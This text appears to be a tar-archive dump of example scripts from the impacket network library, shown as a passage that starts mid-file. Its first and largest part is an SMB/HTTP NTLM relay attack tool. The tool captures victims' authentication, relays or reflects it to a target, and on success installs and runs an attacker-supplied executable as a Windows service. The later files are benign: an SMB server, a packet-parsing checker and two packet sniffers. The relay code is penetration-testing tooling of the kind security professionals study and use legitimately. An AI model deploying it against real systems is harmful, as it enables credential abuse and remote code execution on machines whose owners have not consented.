dcerpc, transport, srvsvc, svcctl from impacket.examples import serviceinstall from impacket.spnego import * from impacket.smb import * from impacket.smbserver import * from threading import Thread class doAttack(Thread): def __init__(self, SMBClient, exeFile): Thread.__init__(self) self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile) def run(self): # Here PUT YOUR CODE! # First of all check whether we're Guest in the target system. # If so, we're screwed. self.installService.install() print "[*] Service Installed.. CONNECT!" self.installService.uninstall() class SMBClient(smb.SMB): def __init__(self, remote_name, extended_security = True, sess_port = 445): self._extendedSecurity = extended_security smb.SMB.__init__(self,remote_name, remote_name, sess_port = sess_port) def neg_session(self): return smb.SMB.neg_session(self, extended_security = self._extendedSecurity) def setUid(self,uid): self._uid = uid def login_standard(self, user, domain, ansiPwd, unicodePwd): smb = NewSMBPacket() smb['Flags1'] = 8 sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey'] sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd) sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd) sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE sessionSetup['Data']['AnsiPwd'] = ansiPwd sessionSetup['Data']['UnicodePwd'] = unicodePwd sessionSetup['Data']['Account'] = str(user) sessionSetup['Data']['PrimaryDomain'] = str(domain) sessionSetup['Data']['NativeOS'] = 'Unix' sessionSetup['Data']['NativeLanMan'] = 'Samba' smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() try: smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) except: print "[!] Error login_standard" return None, STATUS_LOGON_FAILURE else: self._uid = smb['Uid'] return smb, STATUS_SUCCESS def sendAuth(self, authenticateMessageBlob): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY # Are we required to sign SMB? If so we do it, if not we skip it if self._SignatureRequired: smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE smb['Uid'] = self._uid sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() sessionSetup['Parameters']['MaxBufferSize'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VcNumber'] = 1 sessionSetup['Parameters']['SessionKey'] = 0 sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE # Fake Data here, don't want to get us fingerprinted sessionSetup['Data']['NativeOS'] = 'Unix' sessionSetup['Data']['NativeLanMan'] = 'Samba' sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob) sessionSetup['Data']['SecurityBlob'] = str(authenticateMessageBlob) smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() errorCode = smb['ErrorCode'] << 16 errorCode += smb['_reserved'] << 8 errorCode += smb['ErrorClass'] return smb, errorCode def sendNegotiate(self, negotiateMessage): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY # Are we required to sign SMB? If so we do it, if not we skip it if self._SignatureRequired: smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() sessionSetup['Parameters']['MaxBufferSize'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VcNumber'] = 1 sessionSetup['Parameters']['SessionKey'] = 0 sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE # Let's build a NegTokenInit with the NTLMSSP # TODO: In the future we should be able to choose different providers blob = SPNEGO_NegTokenInit() # NTLMSSP blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] blob['MechToken'] = str(negotiateMessage) sessionSetup['Parameters']['SecurityBlobLength'] = len(blob) sessionSetup['Parameters'].getData() sessionSetup['Data']['SecurityBlob'] = blob.getData() # Fake Data here, don't want to get us fingerprinted sessionSetup['Data']['NativeOS'] = 'Unix' sessionSetup['Data']['NativeLanMan'] = 'Samba' smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() try: smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) except: print "[!] SessionSetup Error!" return None else: # We will need to use this uid field for all future requests/responses self._uid = smb['Uid'] # Now we have to extract the blob to continue the auth process sessionResponse = SMBCommand(smb['Data'][0]) sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters']) sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2']) sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength'] sessionData.fromString(sessionResponse['Data']) respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob']) return respToken['ResponseToken'] class HTTPRelayServer(Thread): class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): def __init__(self, server_address, RequestHandlerClass, target, exeFile, mode): self.target = target self.exeFile = exeFile self.mode = mode SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass) class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def __init__(self,request, client_address, server): self.server = server self.protocol_version = 'HTTP/1.1' print "[*] HTTPD: Received connection from %s, attacking target %s" % (client_address[0] ,self.server.target) SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server) def handle_one_request(self): try: SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self) except: pass def log_message(self, format, *args): return def do_HEAD(self): self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() def do_AUTHHEAD(self, message = ''): self.send_response(401) self.send_header('WWW-Authenticate', message) self.send_header('Content-type', 'text/html') self.send_header('Content-Length','0') self.end_headers() def do_GET(self): messageType = 0 if self.headers.getheader('Authorization') == None: self.do_AUTHHEAD(message = 'NTLM') pass else: #self.do_AUTHHEAD() typeX = self.headers.getheader('Authorization') try: _, blob = typeX.split('NTLM') token = base64.b64decode(blob.strip()) except: self.do_AUTHHEAD() messageType = struct.unpack('> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID smbClient.setUid(0) print "[!] Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']) #del (smbData[self.target]) return None, [packet], errorCode else: # We have a session, create a thread and do whatever we want print "[*] Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']) del (smbData[self.target]) clientThread = doAttack(smbClient,self.exeFile) clientThread.start() # Now continue with the server ############################################################# respToken = SPNEGO_NegTokenResp() # accept-completed respToken['NegResult'] = '\x00' # Status SUCCESS errorCode = STATUS_SUCCESS # Let's store it in the connection data connData['AUTHENTICATE_MESSAGE'] = authenticateMessage else: raise("Unknown NTLMSSP MessageType %d" % messageType) respParameters['SecurityBlobLength'] = len(respToken) respData['SecurityBlobLength'] = respParameters['SecurityBlobLength'] respData['SecurityBlob'] = respToken.getData() else: # Process Standard Security respParameters = smb.SMBSessionSetupAndXResponse_Parameters() respData = smb.SMBSessionSetupAndXResponse_Data() sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters']) sessionSetupData = smb.SMBSessionSetupAndX_Data() sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] sessionSetupData.fromString(SMBCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] ############################################################# # SMBRelay smbClient = smbData[self.target]['SMBClient'] if sessionSetupData['Account'] != '': clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials errorCode = STATUS_ACCESS_DENIED if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again packet = smb.NewSMBPacket() packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY packet['Command'] = recvPacket['Command'] packet['Pid'] = recvPacket['Pid'] packet['Tid'] = recvPacket['Tid'] packet['Mid'] = recvPacket['Mid'] packet['Uid'] = recvPacket['Uid'] packet['Data'] = '\x00\x00\x00' packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID smbClient.setUid(0) return None, [packet], errorCode # Now continue with the server else: # We have a session, create a thread and do whatever we want del (smbData[self.target]) clientThread = doAttack(smbClient,self.exeFile) clientThread.start() # Remove the target server from our connection list, the work is done # Now continue with the server ############################################################# # Do the verification here, for just now we grant access # TODO: Manage more UIDs for the same session errorCode = STATUS_SUCCESS connData['Uid'] = 10 respParameters['Action'] = 0 respData['NativeOS'] = smbServer.getServerOS() respData['NativeLanMan'] = smbServer.getServerOS() respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData # From now on, the client can ask for other commands connData['Authenticated'] = True ############################################################# # SMBRelay smbServer.setConnectionData('SMBRelay', smbData) ############################################################# smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def _start(self): self.server.serve_forever() def run(self): print "[*] Setting up SMB Server" self._start() def setTargets(self, targets): self.target = targets def setExeFile(self, filename): self.exeFile = filename def setMode(self,mode): self.mode = mode # Process command-line arguments. if __name__ == '__main__': RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer ) print version.BANNER parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will try to SMB relay that connection to the target system or the original client") parser.add_argument("--help", action="help", help='show this help message and exit') parser.add_argument('-h', action='store', metavar = 'HOST', help='Host to relay the credentials to, if not it will relay it back to the client') parser.add_argument('-e', action='store', required=True, metavar = 'FILE', help='File to execute on the target system') if len(sys.argv)==1: parser.print_help() sys.exit(1) try: options = parser.parse_args() except Exception, e: print e sys.exit(1) if options.h is not None: print "[*] Running in relay mode" mode = 'RELAY' targetSystem = options.h else: print "[*] Running in reflection mode" targetSystem = None mode = 'REFLECTION' exeFile = options.e for server in RELAY_SERVERS: s = server() s.setTargets(targetSystem) s.setExeFile(exeFile) s.setMode(mode) s.start() print "" print "[*] Servers started, waiting for connections" while True: try: sys.stdin.read() except KeyboardInterrupt: sys.exit(1) else: pass impacket-0.9.10/examples/smbserver/0000700000076500000240000000000012141751750017271 5ustar betostaff00000000000000impacket-0.9.10/examples/smbserver/creds.txt0000600000076500000240000000003712141750576021141 0ustar betostaff00000000000000nobody:WORKGROUP:LMHASH:NTHASH impacket-0.9.10/examples/smbserver/simple_server.py0000600000076500000240000000166012141750576022534 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: simple_server.py 612 2012-07-18 13:11:10Z bethus@gmail.com $ # # Simple SMB Server, check smb.conf for details # # Author: # Alberto Solino # from impacket import smbserver server = smbserver.SMBSERVER(('0.0.0.0',445)) server.processConfigFile('smb.conf') # Uncomment this is you want the SMBServer to redirect all the \srvsvc pipe # calls to another DCERPC Server # You might need to run srvsvcserver.py # This is gonna be needed if you want Windows 7 users to connect to the server due # to a nasty bug in the Win7 when asking for shares (it will timeout for minutes before asking to # LANMAN) #server.registerNamedPipe('srvsvc',('0.0.0.0',4344)) server.serve_forever() impacket-0.9.10/examples/smbserver/srvsvcservice.py0000600000076500000240000000106612141750576022564 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: srvsvcservice.py 544 2012-05-12 18:31:15Z bethus@gmail.com $ # # Simple SRVSVC DCERPC Server, to be used by the SMBServer # # Author: # Alberto Solino # from impacket.dcerpc import srvsvcserver srv = srvsvcserver.SRVSVCServer() srv.setListenPort(4344) srv.processConfigFile('./smb.conf') srv.run() impacket-0.9.10/examples/smbtorture.py0000600000076500000240000004302412141750576020053 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smbtorture.py 573 2012-06-24 19:39:05Z bethus@gmail.com $ # # Parses a pcap file or sniffes traffic from the net and checks the SMB structs for errors. # Log the error packets in outFile # # Author: # Alberto Solino # # ToDo: # [ ] Add more SMB Commands # [ ] Do the same for DCERPC import struct from select import select import socket import argparse from impacket import pcapfile, smb, nmb, ntlm, version from impacket import ImpactPacket, ImpactDecoder, structure # Command handler def smbTransaction2( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: return False print "SMB_COM_TRANSACTION2 ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query trans2Parameters= smb.SMBTransaction2_Parameters(SMBCommand['Parameters']) # Do the stuff if trans2Parameters['ParameterCount'] != trans2Parameters['TotalParameterCount']: # TODO: Handle partial parameters #print "Unsupported partial parameters in TRANSACT2!" raise Exception("Unsupported partial parameters in TRANSACT2!") else: trans2Data = smb.SMBTransaction2_Data() # Standard says servers shouldn't trust Parameters and Data comes # in order, so we have to parse the offsets, ugly paramCount = trans2Parameters['ParameterCount'] trans2Data['Trans_ParametersLength'] = paramCount dataCount = trans2Parameters['DataCount'] trans2Data['Trans_DataLength'] = dataCount if trans2Parameters['ParameterOffset'] > 0: paramOffset = trans2Parameters['ParameterOffset'] - 63 - trans2Parameters['SetupLength'] trans2Data['Trans_Parameters'] = SMBCommand['Data'][paramOffset:paramOffset+paramCount] else: trans2Data['Trans_Parameters'] = '' if trans2Parameters['DataOffset'] > 0: dataOffset = trans2Parameters['DataOffset'] - 63 - trans2Parameters['SetupLength'] trans2Data['Trans_Data'] = SMBCommand['Data'][dataOffset:dataOffset + dataCount] else: # Response # ToDo not implemented yet a = 1 except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComOpenAndX( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: return True print "SMB_COM_OPEN_ANDX ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query openAndXParameters = smb.SMBOpenAndX_Parameters(SMBCommand['Parameters']) openAndXData = smb.SMBOpenAndX_Data(SMBCommand['Data']) else: # Response openFileResponse = SMBCommand openFileParameters = smb.SMBOpenAndXResponse_Parameters(openFileResponse['Parameters']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComWriteAndX( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: return False print "SMB_COM_WRITE_ANDX ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query if SMBCommand['WordCount'] == 0x0C: writeAndX = smb.SMBWriteAndX_Parameters2(SMBCommand['Parameters']) else: writeAndX = smb.SMBWriteAndX_Parameters(SMBCommand['Parameters']) writeAndXData = smb.SMBWriteAndX_Data() writeAndXData['DataLength'] = writeAndX['DataLength'] if writeAndX['DataLength'] > 0: writeAndXData.fromString(SMBCommand['Data']) else: # Response writeResponse = SMBCommand writeResponseParameters = smb.SMBWriteAndXResponse_Parameters(writeResponse['Parameters']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComNtCreateAndX( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: return False print "SMB_COM_NT_CREATE_ANDX ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters']) ntCreateAndXData = smb.SMBNtCreateAndX_Data(SMBCommand['Data']) else: # Response ntCreateResponse = SMBCommand ntCreateParameters = smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComTreeConnectAndX( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: return False print "SMB_COM_TREE_CONNECT_ANDX ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters']) treeConnectAndXData = smb.SMBTreeConnectAndX_Data() treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength'] treeConnectAndXData.fromString(SMBCommand['Data']) else: # Response treeConnectAndXParameters = smb.SMBTreeConnectAndXResponse_Parameters(SMBCommand['Parameters']) #treeConnectAndXData = smb.SMBTreeConnectAndXResponse_Data(SMBCommand['Data']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComSessionSetupAndX( packet, packetNum, SMBCommand, questions, replies): # Test return code is always 0, otherwise leave before doing anything if packet['ErrorCode'] != 0: if packet['ErrorClass'] != 0x16: return False print "SMB_COM_SESSION_SETUP_ANDX ", try: if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0: # Query if SMBCommand['WordCount'] == 12: # Extended Security sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters']) sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data() sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] sessionSetupData.fromString(SMBCommand['Data']) if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID: # If there no GSSAPI ID, it must be an AUTH packet blob = smb.SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) token = blob['ResponseToken'] else: # NEGOTIATE packet blob = smb.SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) token = blob['MechToken'] messageType = struct.unpack(' 0: infoFields = ntlmChallenge['TargetInfoFields'] av_pairs = ntlm.AV_PAIRS(ntlmChallenge['TargetInfoFields'][:ntlmChallenge['TargetInfoFields_len']]) if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None: __server_name = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le') if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None: __server_domain = av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le') else: # Standard Security sessionResponse = SMBCommand sessionParameters = smb.SMBSessionSetupAndXResponse_Parameters(sessionResponse['Parameters']) sessionData = smb.SMBSessionSetupAndXResponse_Data(flags = packet['Flags2'], data = sessionResponse['Data']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False def smbComNegotiate( packet, packetNum, command, questions, replies): sessionResponse = command if packet['Flags1'] & smb.SMB.FLAGS1_REPLY: print "SMB_COM_NEGOTIATE ", try: _dialects_parameters = smb.SMBNTLMDialect_Parameters(sessionResponse['Parameters']) _dialects_data = smb.SMBNTLMDialect_Data() _dialects_data['ChallengeLength'] = _dialects_parameters['ChallengeLength'] _dialects_data.fromString(sessionResponse['Data']) if _dialects_parameters['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY: _dialects_parameters = smb.SMBExtended_Security_Parameters(sessionResponse['Parameters']) _dialects_data = smb.SMBExtended_Security_Data(sessionResponse['Data']) except Exception, e: print "ERROR: %s" % e print "Command: 0x%x" % packet['Command'] print "Packet: %d %r" % (packetNum, packet.getData()) return True else: print 'OK!' return False # Format # { SMBCOMMAND: ((questionStruts),(replyStructus), handler) } HANDLER = 2 REPLIES = 1 QUESTIONS = 0 smbCommands = { # smb.SMB.SMB_COM_CREATE_DIRECTORY: (, # smb.SMB.SMB_COM_DELETE_DIRECTORY: self.smbComDeleteDirectory, # smb.SMB.SMB_COM_RENAME: self.smbComRename, # smb.SMB.SMB_COM_DELETE: self.smbComDelete, smb.SMB.SMB_COM_NEGOTIATE: ( None,None,smbComNegotiate), smb.SMB.SMB_COM_SESSION_SETUP_ANDX: ( None,None,smbComSessionSetupAndX), # smb.SMB.SMB_COM_LOGOFF_ANDX: self.smbComLogOffAndX, smb.SMB.SMB_COM_TREE_CONNECT_ANDX: ( None,None,smbComTreeConnectAndX), # smb.SMB.SMB_COM_TREE_DISCONNECT: self.smbComTreeDisconnect, # smb.SMB.SMB_COM_ECHO: self.get_th_sportsmbComEcho, # smb.SMB.SMB_COM_QUERY_INFORMATION: self.smbQueryInformation, smb.SMB.SMB_COM_TRANSACTION2: ( None, None, smbTransaction2), # smb.SMB.SMB_COM_TRANSACTION: self.smbTransaction, # smb.SMB.SMB_COM_NT_TRANSACT: self.smbNTTransact, # smb.SMB.SMB_COM_QUERY_INFORMATION_DISK: sler.smbQueryInformationDisk, smb.SMB.SMB_COM_OPEN_ANDX: (None, None, smbComOpenAndX), # smb.SMB.SMB_COM_QUERY_INFORMATION2: self.smbComQueryInformation2, # smb.SMB.SMB_COM_READ_ANDX: self.smbComReadAndX, # smb.SMB.SMB_COM_READ: self.smbComRead, smb.SMB.SMB_COM_WRITE_ANDX: (None, None, smbComWriteAndX), # smb.SMB.SMB_COM_WRITE: self.smbComWrite, # smb.SMB.SMB_COM_CLOSE: self.smbComClose, # smb.SMB.SMB_COM_LOCKING_ANDX: self.smbComLockingAndX, smb.SMB.SMB_COM_NT_CREATE_ANDX: (None, None, smbComNtCreateAndX), # 0xFF: self.default } # Returns True is the packet needs to be logged def process(data, packetNum): packet = smb.NewSMBPacket() if data.get_packet()[0] == '\x00': if data.get_packet()[4:8] == '\xffSMB': try: packet.fromString(data.get_packet()[4:]) except Exception, e: print "ERROR: %s" % e print "Command: SMBPacket" print "Packet: %d %r" % (packetNum, data.get_packet()) return True else: return False else: return False try: SMBCommand = smb.SMBCommand(packet['Data'][0]) except Exception, e: print "ERROR: %s" % e print "Command: SMBCommand" print "Packet: %d %r" % (packetNum, data.get_packet()) return True if smbCommands.has_key(packet['Command']): return smbCommands[packet['Command']][HANDLER](packet, packetNum, SMBCommand, smbCommands[packet['Command']][QUESTIONS], smbCommands[packet['Command']][REPLIES]) #else: # print "Command 0x%x not handled" % packet['Command'] def main(): import sys DEFAULT_PROTOCOLS = ('tcp',) sockets = [] print version.BANNER parser = argparse.ArgumentParser() parser.add_argument("-i", metavar = 'FILE', help = 'pcap file to read packets. If not specified the program sniffes traffic (only as root)') parser.add_argument("-o", metavar = 'FILE', help = 'pcap output file where the packets with errors will be written') options = parser.parse_args() outFile = options.o if options.i is None: sniffTraffic = True toListen = DEFAULT_PROTOCOLS else: sniffTraffic = False inFile = options.i packetNum = 0 if outFile: f_out = open(outFile,'wb') f_out.write(str(pcapfile.PCapFileHeader())) if sniffTraffic is False: f_in = open(inFile,'rb') hdr = pcapfile.PCapFileHeader() hdr.fromString(f_in.read(len(hdr))) decoder = ImpactDecoder.EthDecoder() else: for protocol in toListen: try: protocol_num = socket.getprotobyname(protocol) except socket.error: print "Ignoring unknown protocol:", protocol toListen.remove(protocol) continue s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sockets.append(s) print "Listening on protocols:", toListen decoder = ImpactDecoder.IPDecoder() while 1: if sniffTraffic is False: pkt = pcapfile.PCapFilePacket() try: pkt.fromString(f_in.read(len(pkt))) except: break pkt['data'] = f_in.read(pkt['savedLength']) p = pkt['data'] else: ready = select(sockets, [], [])[0] for s in ready: p = s.recvfrom(4096)[0] if 0 == len(p): # Socket remotely closed. Discard it. sockets.remove(s) s.close() packet = decoder.decode(p) packetNum += 1 if sniffTraffic is True: instance = packet.child() else: instance = packet.child().child() if isinstance(instance, ImpactPacket.TCP): tcppacket = instance if tcppacket.get_th_sport() == 445 or tcppacket.get_th_dport() == 445 or tcppacket.get_th_sport() == 139 or tcppacket.get_th_dport() == 139: data = tcppacket.child() if data.get_size() > 0: logPacket = process(data, packetNum) if logPacket is True: pkt_out = pcapfile.PCapFilePacket() if sniffTraffic is True: eth = ImpactPacket.Ethernet() eth.contains(packet) eth.set_ether_type(0x800) pkt_out['data'] = eth.get_packet() else: pkt_out['data'] = str(p) if outFile: f_out.write(str(pkt_out)) if __name__ == '__main__': main() impacket-0.9.10/examples/sniff.py0000600000076500000240000000625212141750576016754 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: sniff.py 17 2003-10-27 17:36:57Z jkohen $ # # Simple packet sniffer. # # This packet sniffer uses the pcap library to listen for packets in # transit over the specified interface. The returned packages can be # filtered according to a BPF filter (see tcpdump(3) for further # information on BPF filters). # # Note that the user might need special permissions to be able to use pcap. # # Authors: # Maximiliano Caceres # Javier Kohen # # Reference for: # pcapy: findalldevs, open_live. # ImpactDecoder. import sys import string from threading import Thread import pcapy from pcapy import findalldevs, open_live import impacket from impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder class DecoderThread(Thread): def __init__(self, pcapObj): # Query the type of the link and instantiate a decoder accordingly. datalink = pcapObj.datalink() if pcapy.DLT_EN10MB == datalink: self.decoder = EthDecoder() elif pcapy.DLT_LINUX_SLL == datalink: self.decoder = LinuxSLLDecoder() else: raise Exception("Datalink type not supported: " % datalink) self.pcap = pcapObj Thread.__init__(self) def run(self): # Sniff ad infinitum. # PacketHandler shall be invoked by pcap for every packet. self.pcap.loop(0, self.packetHandler) def packetHandler(self, hdr, data): # Use the ImpactDecoder to turn the rawpacket into a hierarchy # of ImpactPacket instances. # Display the packet in human-readable form. print self.decoder.decode(data) def getInterface(): # Grab a list of interfaces that pcap is able to listen on. # The current user will be able to listen from all returned interfaces, # using open_live to open them. ifs = findalldevs() # No interfaces available, abort. if 0 == len(ifs): print "You don't have enough permissions to open any interface on this system." sys.exit(1) # Only one interface available, use it. elif 1 == len(ifs): print 'Only one interface present, defaulting to it.' return ifs[0] # Ask the user to choose an interface from the list. count = 0 for iface in ifs: print '%i - %s' % (count, iface) count += 1 idx = int(raw_input('Please select an interface: ')) return ifs[idx] def main(filter): dev = getInterface() # Open interface for catpuring. p = open_live(dev, 1500, 0, 100) # Set the BPF filter. See tcpdump(3). p.setfilter(filter) print "Listening on %s: net=%s, mask=%s, linktype=%d" % (dev, p.getnet(), p.getmask(), p.datalink()) # Start sniffing thread and finish main thread. DecoderThread(p).start() # Process command-line arguments. Take everything as a BPF filter to pass # onto pcap. Default to the empty filter (match all). filter = '' if len(sys.argv) > 1: filter = ' '.join(sys.argv[1:]) main(filter) impacket-0.9.10/examples/sniffer.py0000600000076500000240000000414012141750576017275 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: sniffer.py 17 2003-10-27 17:36:57Z jkohen $ # # Simple packet sniffer. # # This packet sniffer uses a raw socket to listen for packets # in transit corresponding to the specified protocols. # # Note that the user might need special permissions to be able to use # raw sockets. # # Authors: # Gerardo Richarte # Javier Kohen # # Reference for: # ImpactDecoder. from select import select import socket import sys import impacket from impacket import ImpactDecoder DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp') if len(sys.argv) == 1: toListen = DEFAULT_PROTOCOLS print "Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0] else: toListen = sys.argv[1:] # Open one socket for each specified protocol. # A special option is set on the socket so that IP headers are included with # the returned data. sockets = [] for protocol in toListen: try: protocol_num = socket.getprotobyname(protocol) except socket.error: print "Ignoring unknown protocol:", protocol toListen.remove(protocol) continue s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sockets.append(s) if 0 == len(toListen): print "There are no protocols available." sys.exit(0) print "Listening on protocols:", toListen # Instantiate an IP packets decoder. # As all the packets include their IP header, that decoder only is enough. decoder = ImpactDecoder.IPDecoder() while len(sockets) > 0: # Wait for an incoming packet on any socket. ready = select(sockets, [], [])[0] for s in ready: packet = s.recvfrom(4096)[0] if 0 == len(packet): # Socket remotely closed. Discard it. sockets.remove(s) s.close() else: # Packet received. Decode and display it. packet = decoder.decode(packet) print packet 